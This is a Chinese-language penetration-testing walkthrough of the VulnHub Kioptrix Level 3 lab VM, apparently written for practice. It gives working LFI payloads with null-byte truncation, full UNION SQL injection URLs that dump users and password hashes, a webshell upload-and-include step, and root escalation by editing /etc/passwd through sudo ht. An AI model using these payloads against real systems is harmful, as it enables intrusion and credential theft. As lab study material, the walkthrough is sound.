vulnhub靶机渗透 KioptrixVM3

KioptrixVM3靶机入侵

1、环境搭建

下载地址：https://download.vulnhub.com/kioptrix/KVM3.rar

​ 下载后用 VMware 或者 VirtualBox 打开，并配置好网卡，靶机与攻击机应置于同一网络下，靶机默认是桥接模式，能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

• 主机发现

  使用nmap进行主机探测（-sP参数也可）：nmap -sn 192.168.110.1/24
  
  192.168.110.133,为靶机ip，也可以使用Kali中的arp-scan工具扫描：arp-scan 192.168.110.1/24

• 端口扫描

  使用nmap扫描端口，并做服务识别和深度扫描（加-A参数）：nmap -p- -A 192.168.110.133
  
  靶机开放了22端口ssh服务和80端口web服务。环境为Ubuntu+Apache+php

3、漏洞探测

• 浏览网页

  浏览网页发现网站后台/index.php?system=Admin，发现CMS 是LotusCMS。
  
  访问首页提示时，302跳转到kioptrix3.com
  

  302跳转到kioptrix3.com。结合靶机提示。应该是要绑定host。

  

• 目录扫描

  使用dirsearch 扫描目录。
  
  

  发现phpadmin页面，尝试admin空口令登录成功,但只能看information_schema 数据库，没什么发现。
  

  还有几个文件报错泄露了绝对路径
  

• 文件包含漏洞

  浏览目录的过程中发现几个有意思得到路径
  /index.php?system=Blog
  /index.php?system=Admin
  

  看着先文件报含，尝试包含/etc/passwd。使用%00截断

  http://192.168.110.133/index.php?system=../../../../../../../../etc/passwd%00.
  

  不但成功读取，泄露了网站绝对路径。发现两个用户dreg和loneferret。记录一下，因为靶机开启了ssh服务，说不定后面能用上。
  

  扫描目录时发现一个上传页面，但是没有权限。如果能登录的话可以利用文件包含getshell。

• SQL注入

  直接访问，SQL语句报错。应该是缺少参数。
  

  输入?id=1 ,页面显示内容。
  

  测得id参数存在SQL注入
  

  可以使用sqlmap 进行注入，重点关注一下gallery数据库。这里使用手工注入。

  http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),database(),4,5,6%20--+
  

发现疑似user用户表，继续注入，得到表中字段

http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27gallarific_users%27),database(),4,5,6%20--+

继续注入得到用户名和密码:admin/n0t7t1k4

http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,(select%20group_concat(username)%20from%20gallarific_users),(select%20group_concat(password)%20from%20gallarific_users),4,5,6%20--+

上面注入是时还发现一个账户表dev_accounts

尝试注入得到

dreg：0d3eccfb887aabd50f243b3f155c0f85
loneferret：5badcaf789d3d1d09794d8f021f40f0e

两个账户名和前面读取/etc/passwd下的ssh用户一致，可以尝试解密后登录ssh。

• 文件包含getshell

  前面找到的登录地址无法利用admin登录。另外找到一个登录页面/gallery/gadmin/ 可以登录
  

  找到一个文件上传的地方，但上传后好像并没有保存。于是我直接修改页面已有的图片，成功传入图片木马：路径为gallery/photos/yc04k8vrbv.jpg
  

  成功包含图片文件

  /index.php?system=../../../../../../../../home/www/kioptrix3.com/gallery/photos/yc04k8vrbv.jpg%00.
  

蚁剑连接成功getshell

• SQL注入写webshell

  既然文件包含成功，说明网站绝对路径正确。可以尝试写webshell。

  当前用户具有写权限且为root用户

  http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,(select%20file_priv%20from%20mysql.user%20where%20user=%27root%27%20and%20host=%27localhost%27),user(),4,5,6%20--+
  

写入webshell

无法写入

应该是未开启secure-file-priv=，限制了mysql得到导入导出

• ssh登录成功

md5解密密码

dreg:Mast3r
loneferret:starwars

成功登录

dreg用户权限很低，好多命令无法执行。loneferret权限更大一点

4、权限提升

• 查找文件

  在loneferret家目录下找到提示：可以使用sudo ht进行编辑文件。
  

  按照提示执行命令：sudo sh。报错不能打开一个xterm-256color.终端。解决办法：

  loneferret@Kioptrix3:~$ export TERM=xterm
  

  把/etc/passwd当前用户的权限修改和root一样即可。 也可以把/etc/sudoers当前用户的权限修改和root一样即可

  ht 修改 /etc/passwd 中 loneferret 用户的UID 为 0，即可获得 root 权限
  
  
  重新登录一下，提权成功